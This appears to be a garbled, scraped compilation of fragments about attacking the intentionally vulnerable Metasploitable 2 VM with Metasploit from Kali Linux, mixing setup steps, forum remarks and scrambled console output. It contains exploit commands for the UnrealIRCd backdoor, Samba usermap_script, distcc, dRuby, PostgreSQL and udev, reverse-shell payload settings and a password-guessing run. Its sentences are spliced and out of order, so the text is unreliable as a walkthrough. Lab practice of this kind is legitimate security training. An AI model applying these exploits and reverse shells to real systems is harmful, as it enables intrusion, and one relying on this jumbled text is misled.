Metasploitable 2 is a deliberately vulnerable Linux installation. In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. [*] Reading from sockets
Have you used Metasploitable to practice Penetration Testing? Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database.
THREADS 1 yes The number of concurrent threads
[*] A is input
The backdoor was quickly identified and removed, but not before quite a few people downloaded it. [*] Accepted the first client connection
After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine.
Let's first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. Help Command
msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for.
Do you have any feedback on the above examples or a resolution to our TWiki History problem?
By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200. Use the showmount Command to see the export list of the NFS server.
Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. From the DVWA home page: "Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. msf exploit(distcc_exec) > set payload cmd/unix/reverse
[*] Backgrounding session 1
Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres. [*] 192.168.127.154:5432 Postgres - Disconnected
USERNAME postgres no A specific username to authenticate as
Module options (exploit/linux/local/udev_netlink):
By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. VHOST no HTTP server virtual host
0 Automatic Target
Let's go ahead.
The two dashes then comment out the remaining Password validation within the executed SQL statement.
Before we perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to the remote system. The web server starts automatically when Metasploitable 2 is booted.
For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2. TIMEOUT 30 yes Timeout for the Telnet probe
LHOST => 192.168.127.159
When hacking computer systems, it is essential to know which systems are on your network, but also know which IP or IPs you are attempting to penetrate.
RHOST 192.168.127.154 yes The target address
[*] Started reverse double handler
[*] chmod'ing and running it
[*] Reading from sockets
-- ----
root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
This particular version contains a backdoor that was slipped into the source code by an unknown intruder.
BLANK_PASSWORDS false no Try blank passwords for all users
Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux.
Exploit target:
LHOST => 192.168.127.159
It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle.
The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. Id Name
Set Version: Ubuntu, and to continue, click the Next button. However, this host has old versions of services, weak passwords and weak encryption.
URI => druby://192.168.127.154:8787
Module options (exploit/linux/postgres/postgres_payload):
msf exploit(usermap_script) > set LHOST 192.168.127.159
[*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically
Relist the files & folders in time descending order showing the newly created file. Have you used Metasploitable to practice Penetration Testing? At a minimum, the following weak system accounts are configured on the system.
RHOST => 192.168.127.154
[*] B: "qcHh6jsH8rZghWdi\r\n"
The list is organized in an interactive table (spreadsheet) with the most important information about each module in one row, namely: Exploit module name with a brief description of the exploit List of platforms and CVEs (if specified in the module) [*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script
For this, Metasploit has an exploit available: A documented security flaw is used by this module to implement arbitrary commands on any system operating distccd. Return to the VirtualBox Wizard now. Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. 0 Generic (Java Payload)
One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases.
[*] B: "VhuwDGXAoBmUMNcg\r\n"
Name Disclosure Date Rank Description
However, the exact version of Samba that is running on those ports is unknown. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. [*] Writing to socket B
[*] Matching
SMBPass no The Password for the specified username
RPORT 3632 yes The target port
payload => cmd/unix/reverse
Loading of any arbitrary file including operating system files. Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions.
msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
Module options (auxiliary/scanner/postgres/postgres_login):
Just enter ifconfig at the prompt to see the details for the virtual machine.
The -Pn flag prevents host discovery pings and just assumes the host is up. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. For network clients, it acknowledges and runs compilation tasks.
LPORT 4444 yes The listen port
[*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1'
Module options (exploit/unix/webapp/twiki_history):
This allows remote access to the host for convenience or remote administration. You'll need to take note of the inet address.
PASSWORD => postgres
I am new to penetration testing .
root. Your public key has been saved in /root/.ssh/id_rsa.pub. [*] A is input
Andrea Fortuna. How to Use Metasploit's Interface: msfconsole.
This could allow more attacks against the database to be launched by an attacker. The purpose of this video is to create a virtual networking environment to learn more about ethical hacking using the Metasploit framework available in Kali Linux. For the final challenge you'll be conducting a short and simple vulnerability assessment of the Metasploitable 2 system, by launching your own vulnerability scans using Nessus, and reporting on the vulnerabilities and flaws that are discovered. These backdoors can be used to gain access to the OS. [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2021-02-06 21:34:46 +0300
SMBUser no The username to authenticate as
[*] Writing to socket A
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Least significant byte first in each pixel. [*] Writing to socket A
rapid7/metasploitable3 Wiki. Metasploitable 2 Among security researchers, Metasploitable 2 is the most commonly exploited online application. PASSWORD no The Password for the specified username
Module options (exploit/multi/misc/java_rmi_server):
What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Both operating systems were a Virtual Machine (VM) running under VirtualBox. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. [*] Matching
Every CVE Record added to the list is assigned and published by a CNA.
RHOST => 192.168.127.154
We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit. ---- --------------- -------- -----------
We can't check every single IP out there for vulnerabilities so we buy (or download) scanners and have them do the job for us. For more information on Metasploitable 2, check out this handy guide written by HD Moore. RPORT 1099 yes The target port
RHOST => 192.168.127.154
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. For this walk-through I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. Nessus was able to log in with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module.
Exploit target:
LPORT 4444 yes The listen port
The risk of the host failing or to become infected is intensely high. The same exploit that we used manually before was very simple and quick in Metasploit. root 2768 0.0 0.1 2092 620 ?
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
List of known vulnerabilities and exploits. For example, the Mutillidae application may be accessed (in this example) at address http://192.168.56.101/mutillidae/. Long list the files with attributes in the local folder. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.
---- --------------- -------- -----------
Payload options (cmd/unix/interact):
RHOSTS yes The target address range or CIDR identifier
I thought about closing ports but I read it isn't possible without killing processes. [*] Automatically selected target "Linux x86"
For a more up-to-date version visit: This version will not install on Metasploitable due to out-of-date packages so best to load it onto a Linux VM such as Kali or Ubuntu.
msf exploit(udev_netlink) > exploit
RHOST yes The target address
Welcome to the MySQL monitor. msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink
msf exploit(distcc_exec) > set RHOST 192.168.127.154
================
Module options (exploit/multi/samba/usermap_script):
The login for Metasploitable 2 is msfadmin:msfadmin. (Note: A video tutorial on installing Metasploitable 2 is available here.) Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment."